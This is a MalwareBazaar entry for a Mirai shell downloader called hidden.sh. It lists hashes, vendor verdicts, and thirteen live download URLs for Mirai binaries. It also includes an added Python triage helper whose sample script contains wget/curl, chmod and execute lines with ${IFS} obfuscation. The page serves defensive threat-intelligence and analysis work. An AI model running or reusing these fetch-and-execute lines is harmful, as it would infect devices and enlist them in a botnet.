MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai
Vendor detections: 9



SHA256 hash: c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa
SHA3-384 hash: e4a9ad8c0682c15b1fc2683acaf7fa3ce85ce426152986d102247e71ec176069769fae7b4eaf9ef5d9407e55ac03432f
SHA1 hash: ff244473ba6212bd9ad5a532c145140f1a464a95
MD5 hash: beaab90fbf1ab306ae5f4b9f14319658
humanhash: johnny-ohio-massachusetts-magnesium
File name: hidden.sh
Signature: Mirai
File size: 2,536 bytes
First seen: 2025-01-20 04:41:16 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:vIaUu2aT2dLaWgaY5aFLWa+JzaT7afEaG6a2Fatna7Ca1:vAuJu8gLu28ug+MP
TLSH: T1365181C5370343352DA7E5E339E94819B3EAD4E6D9C65EA54BF838ACA44DF0D6080AD2
Magika: shell
Reporter: abuse_ch
Tags: sh
Download URLs observed for this sample, with the SHA256 hash, signature and tags of the fetched binary:

URL  Malware sample (SHA256 hash)  Signature  Tags
http://193.143.1.66/bins/hold.x86  b0d4c5f574262235ac9b84f14ab01c858aed158598ac0eac7b9c1197921429e6  Mirai  32-bit elf mirai x86-32
http://193.143.1.66/bins/hold.mips  ec4e12ae7910f54381dd7c325364147b17f96e0d1f5c7cfa8d818c1fc487c3e9  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.mpsl  0496421dac7fc4aac7bd6d45ba1b929727804e101c3690dcedd73231aba3af07  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.arm  1577bfddedee491e4f51793662f011edce5e40dd8ba17f2671c4df818aca5c76  Mirai  elf mirai opendir
http://193.143.1.66/bins/hold.arm5  1c9b4984eb0598462c2d486d0f34191c0ebe55b6f91e763ed3c0e01624585290  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.arm6  4630f8cb2a102cfc5202eef3f49f0073127f6afd07afb07110b5b44bde43a7dc  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.arm7  4d71abad98597a404007e8dc9cbec5d749e21230ff503b7574062b04378aaeb6  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.ppc  99ceabbc5d279884f3663071e0622a6ae8910b342a9f70f94938a676e900678c  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.m68k  a1c846734a90b87cc64ed64f51af377f5082ab719ccc35614a865e4b309025ba  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.spc  c4220f5cfce574e2c2d8e5527f4dee2021bd8410406cafa705d974ab097e30a2  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.i686  c4220f5cfce574e2c2d8e5527f4dee2021bd8410406cafa705d974ab097e30a2  Mirai  elf opendir
http://193.143.1.66/bins/hold.sh4  691a2404ffd4acd39d74b956c463fee7082dd0fb1acc52783663d9d50c1490e8  Mirai  elf mirai ua-wget
http://193.143.1.66/bins/hold.arc  691a2404ffd4acd39d74b956c463fee7082dd0fb1acc52783663d9d50c1490e8  Mirai  elf opendir

Intelligence


File Origin
# of uploads: 1
# of downloads: 94
Origin country: DE
Vendor Threat Intelligence

Verdict: Malicious
Score: 99.9%
Tags: ransomware shellcode mirai virus

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: bash lolbin remote

Result
Verdict: MALICIOUS
Threat name: Win32.Trojan.Okiru

Status: Malicious
First seen: 2025-01-20 04:42:03 UTC
File Type: Text (Shell)
AV detection: 17 of 24 (70.83%)

Threat level: 5/5

Result
Malware family: n/a
Score: 1/10
Tags: linux

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
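The YARA rule above matches shell-script downloaders generically; the IOC table and the hash block on this entry give an analyst what is needed to triage such a script by hand. The following helper is an added example written for this page (it is not MalwareBazaar's or abuse.ch's code): it pulls download URLs out of a downloader script, maps each binary's Mirai build suffix to a CPU architecture, checks the URLs against the list published on this entry, and verifies a file's MD5/SHA1/SHA256/SHA3-384 against the values shown above. The script text it parses is constructed and only modelled on the URL list on this page (the real hidden.sh is not reproduced); the suffix-to-architecture mapping and the 203.0.113.5 placeholder host are assumptions.

```python
"""Triage helper for Mirai-style downloader scripts such as hidden.sh.

Added example for this MalwareBazaar entry, not code from MalwareBazaar
or abuse.ch.  The hashes and KNOWN_URLS come from the page; everything
else (sample script text, architecture mapping) is an assumption.
"""
import hashlib
import re
from urllib.parse import urlparse

# Download URLs listed on this MalwareBazaar entry for hidden.sh.
KNOWN_URLS = {
    "http://193.143.1.66/bins/hold." + suffix
    for suffix in ("x86", "mips", "mpsl", "arm", "arm5", "arm6", "arm7",
                   "ppc", "m68k", "spc", "i686", "sh4", "arc")
}

# Hashes of hidden.sh as shown on this entry (check them on a downloaded copy).
SAMPLE_HASHES = {
    "md5": "beaab90fbf1ab306ae5f4b9f14319658",
    "sha1": "ff244473ba6212bd9ad5a532c145140f1a464a95",
    "sha256": "c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa",
    "sha3_384": "e4a9ad8c0682c15b1fc2683acaf7fa3ce85ce426152986d102247e71ec176069"
                "769fae7b4eaf9ef5d9407e55ac03432f",
}

# Conventional Mirai cross-build suffix -> architecture.  Assumed mapping
# based on common Mirai builds; the page itself does not state it.
ARCH_BY_SUFFIX = {
    "x86": "x86 (32-bit)", "i686": "x86 (i686)", "mips": "MIPS (big-endian)",
    "mpsl": "MIPS (little-endian)", "arm": "ARMv4", "arm5": "ARMv5",
    "arm6": "ARMv6", "arm7": "ARMv7", "ppc": "PowerPC", "m68k": "Motorola 68k",
    "spc": "SPARC", "sh4": "SuperH SH-4", "arc": "ARC",
}

# Constructed stand-in for hidden.sh, modelled on the URL list above.  The
# real sample's text is not reproduced; 203.0.113.5 (TEST-NET-3) is a
# placeholder host added only to exercise the "unknown URL" path.
SAMPLE_SCRIPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.143.1.66/bins/hold.x86; chmod +x hold.x86; ./hold.x86; rm -f hold.x86
wget http://193.143.1.66/bins/hold.mips; chmod +x hold.mips; ./hold.mips; rm -f hold.mips
wget http://193.143.1.66/bins/hold.mpsl; chmod +x hold.mpsl; ./hold.mpsl; rm -f hold.mpsl
wget${IFS}http://193.143.1.66/bins/hold.arm7;chmod${IFS}+x${IFS}hold.arm7;./hold.arm7
curl -O http://203.0.113.5/bins/hold.x86 && chmod +x hold.x86 && ./hold.x86
"""

# A URL token ends at whitespace, a quote or a shell operator.  ${IFS}-style
# padding before the URL does not matter because the search is unanchored.
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s'\"`;|&<>)]+")


def extract_urls(script_text):
    """Return download URLs in order of first appearance, de-duplicated."""
    urls = []
    for match in URL_RE.finditer(script_text):
        url = match.group(0).rstrip(".,")
        if url not in urls:
            urls.append(url)
    return urls


def arch_of(url):
    """Map the file suffix of a fetched binary to an architecture name."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    suffix = name.rsplit(".", 1)[-1] if "." in name else ""
    return ARCH_BY_SUFFIX.get(suffix, "unknown")


def triage(script_text, known_urls=KNOWN_URLS):
    """Summarise hosts, target architectures and URL overlap with this entry."""
    urls = extract_urls(script_text)
    return {
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "architectures": sorted({arch_of(u) for u in urls}),
        "known": [u for u in urls if u in known_urls],
        "unknown": [u for u in urls if u not in known_urls],
    }


def verify_hashes(data, expected=SAMPLE_HASHES):
    """Compare MD5/SHA1/SHA256/SHA3-384 of data with expected hex digests."""
    algos = {"md5": hashlib.md5, "sha1": hashlib.sha1,
             "sha256": hashlib.sha256, "sha3_384": hashlib.sha3_384}
    return {name: algos[name](data).hexdigest() == digest.lower()
            for name, digest in expected.items() if name in algos}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
    # On a real copy of the sample: verify_hashes(open("hidden.sh", "rb").read())
```

Run against a downloaded copy of the sample, `verify_hashes` should return True for all four digests before any further analysis is trusted; a URL in `unknown` means the script references infrastructure the entry's IOC list does not cover and is worth reporting back.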

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Sample: sh c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa (this sample), signature Mirai
